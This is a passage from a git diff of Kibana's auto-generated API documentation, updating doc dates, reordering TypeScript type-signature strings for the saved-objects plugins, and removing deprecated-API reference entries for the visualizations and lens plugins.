actionGroups: ", + " | undefined; } | undefined; id: string; name: string; cancelAlertsOnRuleTimeout?: boolean | undefined; actionGroups: ", { "pluginId": "alerting", "scope": "common", diff --git a/api_docs/rule_registry.mdx b/api_docs/rule_registry.mdx index 5617920bb96b3..27e30d9e49be2 100644 --- a/api_docs/rule_registry.mdx +++ b/api_docs/rule_registry.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ruleRegistry title: "ruleRegistry" image: https://source.unsplash.com/400x175/?github description: API docs for the ruleRegistry plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ruleRegistry'] --- import ruleRegistryObj from './rule_registry.devdocs.json'; diff --git a/api_docs/runtime_fields.mdx b/api_docs/runtime_fields.mdx index 0bb8d03d1f878..bf3a03b0197cd 100644 --- a/api_docs/runtime_fields.mdx +++ b/api_docs/runtime_fields.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/runtimeFields title: "runtimeFields" image: https://source.unsplash.com/400x175/?github description: API docs for the runtimeFields plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'runtimeFields'] --- import runtimeFieldsObj from './runtime_fields.devdocs.json'; diff --git a/api_docs/saved_objects.devdocs.json b/api_docs/saved_objects.devdocs.json index fba13f71ed1cc..03027ee4ba3a3 100644 --- a/api_docs/saved_objects.devdocs.json +++ b/api_docs/saved_objects.devdocs.json @@ -735,7 +735,7 @@ "section": "def-public.SavedObject", "text": "SavedObject" }, - ", \"id\" | \"title\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">, isTitleDuplicateConfirmed: boolean, onTitleDuplicate: (() => void) | undefined, services: Pick<", + ", \"title\" | \"id\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">, isTitleDuplicateConfirmed: boolean, onTitleDuplicate: (() => void) | undefined, services: Pick<", "SavedObjectKibanaServices", ", \"overlays\" | \"savedObjectsClient\">) => Promise" ], @@ -758,7 +758,7 @@ "section": "def-public.SavedObject", "text": "SavedObject" }, - ", \"id\" | \"title\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">" + ", \"title\" | \"id\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">" ], "path": "src/plugins/saved_objects/public/saved_object/helpers/check_for_duplicate_title.ts", "deprecated": false, @@ -1449,22 +1449,6 @@ "plugin": "savedObjectsTaggingOss", "path": "src/plugins/saved_objects_tagging_oss/public/api.ts" }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts" - }, { "plugin": "dashboard", "path": "src/plugins/dashboard/public/services/saved_object_loader.ts" @@ -1508,22 +1492,6 @@ { "plugin": "dashboard", "path": "src/plugins/dashboard/public/application/actions/clone_panel_action.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts" } ], "children": [ diff --git a/api_docs/saved_objects.mdx b/api_docs/saved_objects.mdx index 8874a627fa3dc..198edc76a929d 100644 --- a/api_docs/saved_objects.mdx +++ b/api_docs/saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjects title: "savedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjects'] --- import savedObjectsObj from './saved_objects.devdocs.json'; diff --git a/api_docs/saved_objects_management.devdocs.json b/api_docs/saved_objects_management.devdocs.json index 8d93367005c6c..a0876d761e9a5 100644 --- a/api_docs/saved_objects_management.devdocs.json +++ b/api_docs/saved_objects_management.devdocs.json @@ -278,7 +278,7 @@ "label": "euiColumn", "description": [], "signature": [ - "{ children?: React.ReactNode; color?: string | undefined; className?: string | undefined; height?: string | number | undefined; id?: string | undefined; lang?: string | undefined; name: React.ReactNode; style?: React.CSSProperties | undefined; width?: string | undefined; role?: React.AriaRole | undefined; tabIndex?: number | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"true\" | \"false\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"true\" | \"false\" | undefined; 'aria-checked'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"true\" | \"false\" | undefined; 'aria-dropeffect'?: \"none\" | \"link\" | \"copy\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"true\" | \"false\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"true\" | \"false\" | undefined; 'aria-haspopup'?: boolean | \"dialog\" | \"grid\" | \"listbox\" | \"menu\" | \"tree\" | \"true\" | \"false\" | undefined; 'aria-hidden'?: boolean | \"true\" | \"false\" | undefined; 'aria-invalid'?: boolean | \"true\" | \"false\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiline'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiselectable'?: boolean | \"true\" | \"false\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-readonly'?: boolean | \"true\" | \"false\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"true\" | \"false\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"true\" | \"false\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"ascending\" | \"descending\" | \"other\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChange?: React.FormEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onError?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; title?: string | undefined; render?: ((value: any, record: ", + "{ children?: React.ReactNode; onError?: React.ReactEventHandler | undefined; render?: ((value: any, record: ", { "pluginId": "savedObjectsManagement", "scope": "public", @@ -286,7 +286,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - ") => React.ReactNode) | undefined; hidden?: boolean | undefined; description?: string | undefined; security?: string | undefined; field: (string & {}) | keyof ", + ") => React.ReactNode) | undefined; hidden?: boolean | undefined; color?: string | undefined; className?: string | undefined; title?: string | undefined; onChange?: React.FormEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; id?: string | undefined; description?: string | undefined; security?: string | undefined; name: React.ReactNode; field: (string & {}) | keyof ", { "pluginId": "savedObjectsManagement", "scope": "public", @@ -294,7 +294,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - "; defaultValue?: string | number | readonly string[] | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"off\" | \"on\" | undefined; inputMode?: \"none\" | \"text\" | \"search\" | \"email\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; readOnly?: boolean | undefined; align?: ", + "; defaultValue?: string | number | readonly string[] | undefined; lang?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; style?: React.CSSProperties | undefined; tabIndex?: number | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; role?: React.AriaRole | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"on\" | \"off\" | undefined; inputMode?: \"none\" | \"email\" | \"search\" | \"text\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"false\" | \"true\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"false\" | \"true\" | undefined; 'aria-checked'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"false\" | \"true\" | undefined; 'aria-dropeffect'?: \"none\" | \"copy\" | \"link\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"false\" | \"true\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"false\" | \"true\" | undefined; 'aria-haspopup'?: boolean | \"grid\" | \"menu\" | \"false\" | \"true\" | \"dialog\" | \"listbox\" | \"tree\" | undefined; 'aria-hidden'?: boolean | \"false\" | \"true\" | undefined; 'aria-invalid'?: boolean | \"false\" | \"true\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiline'?: boolean | \"false\" | \"true\" | undefined; 'aria-multiselectable'?: boolean | \"false\" | \"true\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-readonly'?: boolean | \"false\" | \"true\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"false\" | \"true\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"false\" | \"true\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"other\" | \"ascending\" | \"descending\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; height?: string | number | undefined; width?: string | undefined; readOnly?: boolean | undefined; align?: ", "HorizontalAlignment", " | undefined; abbr?: string | undefined; footer?: string | React.ReactElement> | ((props: ", "EuiTableFooterProps", @@ -306,7 +306,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - ">) => React.ReactNode) | undefined; colSpan?: number | undefined; headers?: string | undefined; rowSpan?: number | undefined; scope?: string | undefined; valign?: \"baseline\" | \"middle\" | \"top\" | \"bottom\" | undefined; dataType?: ", + ">) => React.ReactNode) | undefined; colSpan?: number | undefined; headers?: string | undefined; rowSpan?: number | undefined; scope?: string | undefined; valign?: \"top\" | \"bottom\" | \"middle\" | \"baseline\" | undefined; dataType?: ", "EuiTableDataType", " | undefined; isExpander?: boolean | undefined; textOnly?: boolean | undefined; truncateText?: boolean | undefined; mobileOptions?: (Omit<", "EuiTableRowCellMobileOptionsShape", diff --git a/api_docs/saved_objects_management.mdx 